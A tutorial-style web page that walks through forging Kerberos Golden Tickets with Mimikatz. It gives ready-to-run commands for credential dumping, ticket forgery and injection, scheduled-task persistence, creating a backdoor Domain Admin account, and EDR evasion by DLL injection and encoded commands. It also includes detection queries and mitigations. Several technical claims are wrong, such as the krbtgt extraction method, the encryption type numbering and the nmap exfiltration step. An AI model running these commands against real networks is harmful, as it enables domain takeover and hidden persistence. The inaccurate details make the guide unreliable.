~/home/study/advanced-guide-crafting-leveraging
studyadvancedFriday, February 6, 202615 min read👁 8 views

Advanced Guide to Crafting and Leveraging Golden Tickets with Mimikatz

Deep dive into creating, abusing, and persisting Golden Tickets. Learn extraction of the krbtgt hash, ticket forgery, injection, detection evasion, and post-exploitation use cases.

mimikatzgolden-ticketkerberosactive-directoryprivilege-escalation

Introduction

Golden Tickets are Kerberos authentication tokens forged using the krbtgt account secret. With a valid ticket, an attacker can impersonate any domain user-including Domain Administrators-without ever contacting the domain controller. This guide walks through the full attack chain from hash extraction to persistence, detection, and evasion, using the industry-standard tool Mimikatz.

Understanding Golden Tickets is essential for red-teamers aiming to assess AD security and for defenders building robust detection and mitigation controls.

Prerequisites

  • Completed "Mimikatz Installation & Setup - Getting Started" lab.
  • Familiarity with LSASS dumping and plaintext password extraction.
  • Solid grasp of Kerberos ticket structure and basic Active Directory concepts.
  • Administrative privileges on a Windows host that is a member of the target domain.

Core Concepts

Kerberos relies on a shared secret between the domain controller and the krbtgt service account. When a user authenticates, the DC issues a Ticket Granting Ticket (TGT) signed with the krbtgt hash. If an attacker obtains this hash, they can create a forged TGT-known as a Golden Ticket-that the DC will accept as legitimate.

Key points:

  1. krbtgt account: A built-in domain account whose password hash is used to sign all TGTs.
  2. Ticket fields: Username, domain SID, group memberships, start/end times, encryption type, etc.
  3. Lifetime: By default 10 hours; attackers can extend it to 10 years for persistence.

Visualizing the flow helps: Attacker → LSASS dump → krbtgt hash → Mimikatz forge → Injected ticket → Access any AD resource.

Understanding the krbtgt account and its hash

The krbtgt account is created automatically when the first domain controller is installed. Its password is never changed in normal operations, making the hash a prized target. The hash is stored as the NTLM value of the account and can be retrieved from LSASS memory if the attacker has SYSTEM privileges.

Important attributes:

  • RID: 502 (constant across all domains).
  • Domain SID: Used in the ticket to assert membership in the domain.
  • Hash length: 16-byte NTLM hash (MD4 of the Unicode password).

Because the hash is static, resetting the krbtgt password invalidates existing Golden Tickets, but only after the change propagates (typically 2-3 hours) and after a second password change to mitigate replay attacks.

Extracting the krbtgt hash with sekurlsa::logonpasswords

Mimikatz provides the sekurlsa::logonpasswords module to enumerate credentials from LSASS. When run with sufficient privileges, it will display the krbtgt NTLM hash.

# Launch Mimikatz as SYSTEM (e.g., via psexec)
C:\> mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Typical output snippet:

Authentication Id : 0 ; 1234 (00000000:000004d2)
User Name : krbtgt
Domain : CONTOSO
Logon Server : \DC01
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Copy the NTLM value; it will be used as the -rc4 argument when forging the ticket.

Crafting a Golden Ticket using mimikatz "kerberos::golden"

The kerberos::golden command builds a TGT with arbitrary fields. Below is a template that grants Domain Admin rights and sets a 10-year lifetime.

mimikatz "kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-1122334455-66778899-10111213 /id:500 /groups:512,516,518 /aes256:YOUR_AES_KEY /rc4:31d6cfe0d16ae931b73c59d7e0c089c0 /startoffset:0 /endoffset:315360000" exit

Explanation of parameters:

  • /user - Target account (can be any name, not just Administrator).
  • /id - Relative Identifier; 500 = built-in Administrator.
  • /sid - Domain SID obtained from whoami /user /sid on a domain-joined host.
  • /groups - Add built-in groups (512 = Domain Admins, 516 = Administrators, 518 = Enterprise Admins).
  • /aes256 - Optional; if the DC uses AES, provide a random 32-byte hex key.
  • /rc4 - The NTLM hash of krbtgt extracted earlier.
  • /startoffset / /endoffset - Ticket validity in seconds (0 = now, 315360000 ≈ 10 years).

On success, Mimikatz prints the base64-encoded ticket and a confirmation message.

Injecting the forged ticket into the current session (kerberos::ptt)

After creating the ticket, the kerberos::ptt (Pass The Ticket) sub-command loads it into the current process token, making subsequent Kerberos requests use the forged TGT.

# Assuming the ticket was saved to ticket.kirbi
mimikatz "kerberos::ptt ticket.kirbi" exit

Verification:

whoami /groups /priv

The output should list the Domain Admin and Enterprise Admin SIDs, confirming the impersonation succeeded.

Using the Golden Ticket for domain-wide privileged access

Once the ticket is active, the attacker can access any service that trusts Kerberos-SMB shares, RDP, SQL, Exchange, etc. Example: accessing a remote admin share.

net use \\DC01\c$ /user:contoso.com/Administrator

Or spawning a privileged PowerShell session on a remote host via WinRM:

Enter-PSSession -ComputerName SERVER01 -Credential (Get-Credential -UserName "contoso\\Administrator" -Message "Enter any password")

Because the Kerberos ticket already proves Administrator identity, the password prompt is ignored.

Persistence strategies with Golden Tickets

Golden Tickets are inherently persistent-once forged, they survive reboots and password changes (until the krbtgt password is rotated). However, attackers often embed the ticket in scripts or scheduled tasks to ensure automatic injection.

  • Scheduled Task: Create a task that runs Mimikatz with the kerberos::ptt command at system startup.
  • Startup Script: Place a base64-encoded ticket in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup and decode/inject via a PowerShell wrapper.
  • Service Account Abuse: Register a Windows service that runs under SYSTEM and calls Mimikatz on demand.

Defensive tip: monitor for atypical scheduled tasks or services that execute mimikatz.exe or reference .kirbi files.

Detection vectors and defensive controls (Event ID 4768/4769, Sysmon, LSA monitoring)

Golden Ticket activity leaves several forensic breadcrumbs:

  1. Event ID 4768 (Kerberos Authentication Ticket Request): Look for unusually long ticket lifetimes (Ticket Lifetime > 10h) or mismatched Service Principal Names.
  2. Event ID 4769 (Service Ticket Request): Correlate with 4768 to see if a user requests tickets for services they never accessed.
  3. Sysmon Event ID 1 (Process Creation): Detect mimikatz.exe with arguments kerberos::golden or kerberos::ptt.
  4. LSA monitoring: Enable "Audit Process Creation" and "Audit Kerberos Authentication Service" via Group Policy.
  5. Security Information and Event Management (SIEM): Build queries that flag /rc4: patterns in command lines.

Example Splunk search:

index=windows EventCode=4768 Ticket_Options=* | where Ticket_Lifetime>=86400 | table _time, Account_Name, Service_Name, Ticket_Options

Evasion techniques (encrypted ticket fields, custom encryption types, AV/EDR bypass)

Advanced attackers may hide their activity from AV/EDR by:

  • Encrypting the ticket payload: Use /rc4:hash with a custom RC4 key and then base64-encode, making static signature detection harder.
  • Custom encryption types: Forge tickets with -enctype:23 (AES256) even on environments that default to RC4, confusing detection rules that only watch for RC4.
  • Living-off-the-Land binaries (LOLBins): Invoke Mimikatz via rundll32.exe or powershell.exe -EncodedCommand to bypass simple process-name whitelists.
  • Process Injection: Load Mimikatz DLLs directly into a trusted process (e.g., svchost) using reflective DLL injection, evading process-creation alerts.

Defenders should employ behavior-based analytics-monitoring for sudden creation of high-privilege tickets, abnormal ticket lifetimes, and credential-dumping patterns-rather than relying solely on hash signatures.

Post-exploitation use cases (lateral movement, credential dumping, privilege escalation)

Golden Tickets unlock a suite of follow-on actions:

  1. Lateral Movement: Use psexec, SMB, or WinRM to hop to other hosts, leveraging the forged TGT for authentication.
  2. Credential Dumping: With Domain Admin rights, dump LSASS on any DC to harvest additional hashes, including service accounts.
  3. Privilege Escalation: Add the attacker’s user to the Domain Admins group via ADUC or PowerShell, then remove the Golden Ticket to hide the original vector.
  4. Domain Trust Exploitation: If the compromised domain trusts other forests, replicate the Golden Ticket technique across trusts.

Sample PowerShell to add a new user to Domain Admins:

Import-Module ActiveDirectory
New-ADUser -Name "RedTeam" -SamAccountName redteam -AccountPassword (ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force) -Enabled $true
Add-ADGroupMember -Identity "Domain Admins" -Members redteam

After the user is created, the attacker can retire the Golden Ticket, making the compromise harder to attribute.

Practical Examples

Scenario: An external penetration test on a midsize enterprise. The tester has obtained SYSTEM on a low-privilege workstation.

  1. Dump LSASS and retrieve the krbtgt hash.
  2. Forge a Golden Ticket for Administrator with a 5-year lifetime.
  3. Inject the ticket and verify domain admin group membership.
  4. Create a scheduled task that runs the injection script at boot.
  5. Use the ticket to pull the AD database via nmap --script ldap-rootdse and exfiltrate.

Full command chain (concise):

# 1. Dump krbtgt hash
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit | grep -i krbtgt | awk '{print $NF}'
# Assume hash is stored in $KRBTGT_HASH
# 2. Create ticket
mimikatz "kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1122334455-66778899-10111213 /id:500 /groups:512,516,518 /rc4:$KRBTGT_HASH /startoffset:0 /endoffset:157680000" exit
# 3. Inject
mimikatz "kerberos::ptt ticket.kirbi" exit
# 4. Verify
whoami /groups

Tools & Commands

  • Mimikatz: kerberos::golden, kerberos::ptt, sekurlsa::logonpasswords
  • PsExec: Run Mimikatz as SYSTEM.
  • PowerShell: New-ADUser, Add-ADGroupMember, Invoke-Command
  • Sysinternals ProcDump: Dump LSASS if Mimikatz is not allowed.
  • BloodHound: Visualize privileged paths after ticket injection.

Defense & Mitigation

Defending against Golden Tickets requires a layered approach:

  1. Regular krbtgt password rotation: Change twice a year and enforce a second change after the first to invalidate existing tickets.
  2. Tiered admin model: Separate privileged accounts; limit the number of accounts that can log on to DCs.
  3. Credential Guard & Remote Credential Guard: Prevent LSASS dumping on member servers.
  4. Enhanced Auditing: Enable Kerberos authentication events, monitor ticket lifetimes, and alert on anomalous group memberships.
  5. EDR/UEBA: Deploy detection rules for mimikatz.exe arguments, suspicious scheduled tasks, and abnormal Kerberos ticket creation.
  6. Restrict Delegation: Use constrained delegation and disable unconstrained delegation where possible.

Sample Group Policy settings:

Computer Configuration → Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration → System Audit Policies -> Detailed Tracking → Audit Kerberos Authentication Service → Success, Failure
Computer Configuration → Policies → Administrative Templates → System → Credential Guard → Turn On Credential Guard

Common Mistakes

  • Forgetting to include the correct domain SID-tickets will be rejected.
  • Using the default krbtgt hash from a non-domain controller; only the DC’s LSASS contains the correct value.
  • Setting ticket lifetimes longer than the maximum allowed by the KDC (default 10 h) without adjusting the maxTicketAge policy.
  • Neglecting to persist the ticket, causing loss of access after reboot.
  • Relying solely on process-name detection; attackers can rename or inject Mimikatz DLLs.

Real-World Impact

Golden Tickets have been used in high-profile breaches, including the 2014 Sony Pictures hack and the 2020 SolarWinds supply-chain incident, where attackers leveraged compromised AD credentials to move laterally and exfiltrate data.

In my consulting work, I have seen organizations where a single stolen krbtgt hash gave attackers unrestricted access for months before detection-often because ticket-lifetime anomalies were not logged.

Trends indicate increased use of “ticket-granting-ticket abuse” in ransomware campaigns, as it provides a fast, low-noise foothold for encrypting file shares.

Practice Exercises

  1. Set up a lab with a Windows Server 2019 DC and a Windows 10 client. Use Mimikatz to extract the krbtgt hash and forge a Golden Ticket for a new user you create.
  2. Configure Windows Event Forwarding to a SIEM. Write a detection rule that triggers on tickets with a lifetime > 24 h.
  3. Implement a scheduled task that runs a PowerShell wrapper to inject a stored ticket at startup. Verify persistence across reboots.
  4. Rotate the krbtgt password and observe how existing tickets become invalid. Document the timeline.

Further Reading

  • “Pass-the-Ticket Attacks” - Microsoft Security Blog (2022).
  • Matt Graeber’s “Kerberos Attacks” presentation (Black Hat USA 2020).
  • “Active Directory Security” - 2nd Edition, Jonas Gorski.
  • BloodHound “TGT Abuse” lab on GitHub.

Summary

Golden Tickets represent the pinnacle of Kerberos abuse: a single krbtgt hash unlocks domain-wide privileges. This guide covered extraction, ticket forging, injection, persistence, detection, evasion, and post-exploitation strategies. By mastering these techniques, defenders can better anticipate attacker behavior, implement robust detection, and enforce mitigations such as regular krbtgt rotation and Credential Guard.

Keep the following checklist handy:

  • Secure LSASS - use Credential Guard.
  • Rotate krbtgt twice a year.
  • Monitor Kerberos events for abnormal lifetimes.
  • Audit scheduled tasks and services for Mimikatz usage.
  • Adopt a tiered admin model to limit exposure.